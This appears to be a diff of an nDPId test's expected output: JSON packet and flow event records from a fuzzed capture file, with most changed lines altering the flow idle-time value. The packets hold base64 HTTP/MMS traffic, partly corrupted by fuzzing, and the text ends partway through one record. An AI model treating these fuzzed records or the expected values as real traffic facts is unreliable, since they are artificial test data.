00925{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":479,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl0lcwCLk5N8CABFAAHRFktVAIAGhKGsFAMFrBQDDQorAFDkqXCFyh06CVAYIo+iDAAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVmdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2tpZTpKVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1031854514845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854514845,"pkt":"AFCLk5N8CAAgsl17CABFIAAoxL1AAEAGF9isFAMNrBQDBQBQCivKHToJ5KlwhVAQgyxqnAAA"} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"CAAgsl17AFCLk5N8CABFAAAoGktAAIAGgkqsFAMFSBQDDQorAFDkqXIuyh06mFARIanJ5gAApxaHSO7L"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"AFCLk5PaCAAgsl17CABFAAAoxL9AAEAGF9asFAMNrBRSBQBQCivKHTqY5KlyL1AQgyxoYwAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525904,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525904,"pkt":"CAAgsl17AFCLk5N8CABFAAAoG0tAAIAGgUqsFAMFRCVzAAorAFDkqXIvyh06mVAQIanJ5QAApxaHSO7L"} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532142,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854532142,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1031854514845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854514845,"pkt":"AFCLk5N8CAAgsl17CABFIAAoxL1AAEAGF9isFAMNrBQDBQBQCivKHToJ5KlwhVAQgyxqnAAA"} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"CAAgsl17AFCLk5N8CABFAAAoGktAAIAGgkqsFAMFSBQDDQorAFDkqXIuyh06mFARIanJ5gAApxaHSO7L"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"AFCLk5PaCAAgsl17CABFAAAoxL9AAEAGF9asFAMNrBRSBQBQCivKHTqY5KlyL1AQgyxoYwAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525904,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525904,"pkt":"CAAgsl17AFCLk5N8CABFAAAoG0tAAIAGgUqsFAMFRCVzAAorAFDkqXIvyh06mVAQIanJ5QAApxaHSO7L"} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532142,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854532142,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":59136,"global_ts_msec":1031854532143} 
00838{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":413,"pkt_type":59136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":413,"pkt_l4_len":0,"thread_ts_msec":1031854532143,"pkt":"CAAgsl17AFCLk5N85wA1AAGPIUtAAIAGeeOsFAMFrBQDDQosAFDk5rNZyl7q2lAYIjgNigAAWXVTdz09IiwiMi1gZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2t6ZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcgRhcmQtbXNpc2RuPTO0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29va2llOiBVc2VyLQlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJlcg0KQ29va2llOiBJcC1BZGRyZXNzPTE5Mi4xNjguMi4yNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFBdCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZVQKDQo="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854532143,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMJAAEAGF9OsFAMNrBREBQBQCizKXura5OazWVAlcwB2dwAA"} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854532143,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMJAAEAGF9OsFAMNrBREBQBQCizKXura5OazWVAlcwB2dwAA"} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854535021} 02307{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFACVzAEtAAIAGcJasFAMFrBQDDQotAFDk8Vvgym1xzFAQIjhHEAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXB0OiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0Rm9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IENuDQpVc2VyLUFnZW50OiBTb255inJpY3Nzb25UNjgvUjIwMUENCkFjY2Vw9C1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdqdyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0ibHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2Nja3BzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhJXMAcmRmOmxpPmFwcGxpY2F0aW9uL3ZubC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkZjpCYWc+PC9wcmY6Q2NwcEFjY2VwdD48L3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYt1TogPD94bWwgdmVyc2lvbj
